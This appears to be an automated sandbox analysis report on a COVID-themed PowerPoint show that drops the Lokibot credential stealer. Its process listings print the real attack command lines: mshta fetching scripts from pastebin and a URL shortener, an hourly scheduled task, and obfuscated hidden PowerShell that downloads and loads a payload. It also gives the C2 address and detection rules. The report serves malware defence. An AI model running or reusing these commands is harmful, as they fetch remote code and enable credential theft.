Loading ...

Play interactive tourEdit tour

Analysis Report covid-19 preventive measures.pps

Overview

General Information

Sample Name:covid-19 preventive measures.pps
MD5:cc17a31bb6d2ce8d57d3a108782b6796
SHA1:4f996c5df95fdde1662c76238760f6f585732b28
SHA256:63dd9c2279f0a416634a20224e9e8e015c7f8fab93e1147212ead6867cb7e68f

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Mshta Download Pastebin
Sigma detected: Powershell execute code from registry
Sigma detected: Schedule script from internet via mshta
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Lokibot
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Creates processes via WMI
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Notepad Making Network Connection
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected aPLib compressed binary
Adds / modifies Windows certificates
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Domain name seen in connection with other malware
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7
  • POWERPNT.EXE (PID: 3844 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 0F144ECA8CFEC8882A3809D176886255)
  • cmd.exe (PID: 3948 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\covid-19 preventive measures.pps' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 3996 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\covid-19 preventive measures.pps' MD5: 0F144ECA8CFEC8882A3809D176886255)
      • mshta.exe (PID: 4076 cmdline: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • mshta.exe (PID: 1544 cmdline: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • schtasks.exe (PID: 2248 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • mshta.exe (PID: 2152 cmdline: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\NPPve1Q3' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2292 cmdline: powershell ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • notepad.exe (PID: 2496 cmdline: {path} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • taskeng.exe (PID: 2480 cmdline: taskeng.exe {64255203-6FC8-4F1D-AED4-04FE69F8E86E} S-1-5-21-290172400-2828352916-2832973385-1004:computer\user:Interactive:[1] MD5: 4F2659160AFCCA990305816946F69407)
    • mshta.exe (PID: 2544 cmdline: C:\Windows\system32\mshta.EXE https://%20%20@pastebin.com\raw\eYgN0VQJ MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 2440 cmdline: powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/ZMvuU7Df'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2692 cmdline: 'C:\Windows\system32\mshta.exe' 'https://%20%20@pastebin.com\raw\Y9J7y39n' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • mshta.exe (PID: 2912 cmdline: 'C:\Windows\system32\mshta.exe' 'https://%20%20@pastebin.com\raw\SHWX0snh' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • mshta.exe (PID: 2460 cmdline: 'C:\Windows\system32\mshta.exe' 'https://%20%20@pastebin.com\raw\NPPve1Q3' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 3488 cmdline: powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/ZMvuU7Df'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X) MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • mshta.exe (PID: 2812 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close') MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 3156 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • notepad.exe (PID: 4000 cmdline: {path} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • powershell.exe (PID: 2156 cmdline: powershell ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • notepad.exe (PID: 2948 cmdline: {path} MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"c2:": "https://visina-centar.com/glsx/btls/fre.php"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000020.00000002.1060151120.00400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
    00000020.00000002.1060151120.00400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000020.00000002.1060151120.00400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
      • 0x13bff:$des3: 68 03 66 00 00
      • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
      • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
      00000020.00000002.1060151120.00400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
      • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
      • 0x153fc:$a2: last_compatible_version
      00000024.00000002.1175641826.00400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        36.2.notepad.exe.400000.0.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
          36.2.notepad.exe.400000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            36.2.notepad.exe.400000.0.raw.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x13bff:$des3: 68 03 66 00 00
            • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            36.2.notepad.exe.400000.0.raw.unpackLoki_1Loki Payloadkevoreilly
            • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x153fc:$a2: last_compatible_version
            32.2.notepad.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableSteve Miller, Florian Roth
            • 0x13e78:$s1: http://
            • 0x17633:$s1: http://
            • 0x13e80:$s2: https://
            • 0x18074:$s2: \x97\x8B\x8B\x8F\x8C\xC5\xD0\xD0
            • 0x13e78:$f1: http://
            • 0x17633:$f1: http://
            • 0x13e80:$f2: https://
            Click to see the 21 entries

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Mshta Download PastebinShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ', CommandLine: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ', CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4076, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' 'https://%20%20@pastebin.com\raw\eYgN0VQJ', ProcessId: 1544
            Sigma detected: Powershell execute code from registryShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, ProcessId: 3156
            Sigma detected: Schedule script from internet via mshtaShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F , CommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F , CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4076, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 60 /tn 'xesefiliym' /tr '\'mshta\'https://%20%20@pastebin.com\raw\eYgN0VQJ' /F , ProcessId: 2248
            Sigma detected: MSHTA Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, ProcessId: 3156
            Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, CommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\covid-19 preventive measures.pps', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 3996, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' https:\\%20%20@j.mp\ddddjxdsadasdasidjaisd, ProcessId: 4076
            Sigma detected: Notepad Making Network ConnectionShow sources
            Source: Network ConnectionAuthor: EagleEye Team: Data: DestinationIp: 77.105.36.109, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 2496, Protocol: tcp, SourceIp: 192.168.2.2, SourceIsIpv6: false, SourcePort: 49170

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: notepad.exe.2496.23.memstrMalware Configuration Extractor: Lokibot {"c2:": "https://visina-centar.com/glsx/btls/fre.php"}
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://visina-centar.com/glsx/btls/fre.phpVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: covid-19 preventive measures.ppsVirustotal: Detection: 14%Perma Link
            Machine Learning detection for sampleShow sources
            Source: covid-19 preventive measures.ppsJoe Sandbox ML: detected

            Source: C:\Windows\System32\notepad.exeCode function: 23_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,23_2_00403D74
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior

            Software Vulnerabilities:

            barindex
            Document exploit detected (process start blacklist hit)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exeJump to behavior

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49170 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49170 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49170 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49170 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.2:49171 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49171 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49171 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.2:49171 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49172 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49172 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49172 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49172 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49173 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49173 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49173 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49173 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49174 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49174 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49174 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49174 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49175 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49175 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49175 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49175 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49177 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49177 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49177 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49177 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49178 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49178 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49178 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49178 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49179 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49179 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49179 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49179 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49180 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49180 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49180 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49180 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49181 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49181 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49181 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49181 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49182 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49182 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49182 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49182 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49183 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49183 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49183 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49183 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49184 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49184 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49184 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49184 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49185 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49185 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49185 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49185 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49186 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49186 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49186 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49186 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49187 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49187 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49187 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49187 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49188 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49188 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49188 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49188 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49189 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49189 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49189 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49189 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49190 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49190 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49190 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49190 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49191 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49191 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49191 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49191 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49193 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49193 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.2:49193 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.2:49193 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.2:49194 -> 77.105.36.109:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.2:49194 -> 77.105.36.109:80
